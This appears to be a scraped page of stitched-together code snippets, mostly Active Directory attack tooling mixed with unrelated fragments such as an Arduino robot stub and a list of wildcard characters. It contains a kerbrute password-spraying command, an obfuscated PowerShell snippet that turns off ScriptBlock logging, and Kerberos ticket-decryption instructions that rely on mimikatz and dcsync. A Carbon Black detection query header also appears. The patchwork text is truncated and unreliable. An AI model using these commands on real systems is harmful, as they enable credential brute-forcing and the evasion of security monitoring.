With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
var Cylon = require('cylon'); | |
var EventEmitter = require('events').EventEmitter; | |
var Hapi = require('hapi'); | |
var bot = new EventEmitter(); | |
var on = false; | |
Cylon.robot({ | |
connections: { | |
arduino: { |
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
function Get-DNSARecords { | |
<# | |
.SYNOPSIS | |
Dumps A Records from a Microsoft Windows DNS server. | |
.DESCRIPTION | |
This script dumps the conent of MicrosoftDNS_AType to a CSV file. | |
.PARAMETER Server | |
The name of the Computer you want to run the command against. | |
.PARAMETER CSVPath |
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
# Carbon Black Evil PowerShell LSASS Query | |
# | |
# Prints out malicious Powershell events that have a crossproc event for c:\windows\system32\lsass.exe | |
# | |
# Author: Jason Lang (@curi0usJack) | |
# | |
# Prereqs (Windows 10) | |
# Install bash on Win10 | |
# sudo apt-get install python-pip | |
# sudo pip install --upgrade requests |
#!/usr/bin/env python2 | |
# NOTE: this script was created for educational purposes to assist learning about kerberos tickets. | |
# Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets. | |
# | |
# Recommended Instructions: | |
# Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export" | |
# Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>" | |
# Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket) | |
# Run this script to decrypt: | |
# ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./Administrator@TESTLAB.LOCAL_krbtgt~TESTLAB.LOCAL@TESTLAB.LOCAL.ccaches |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module: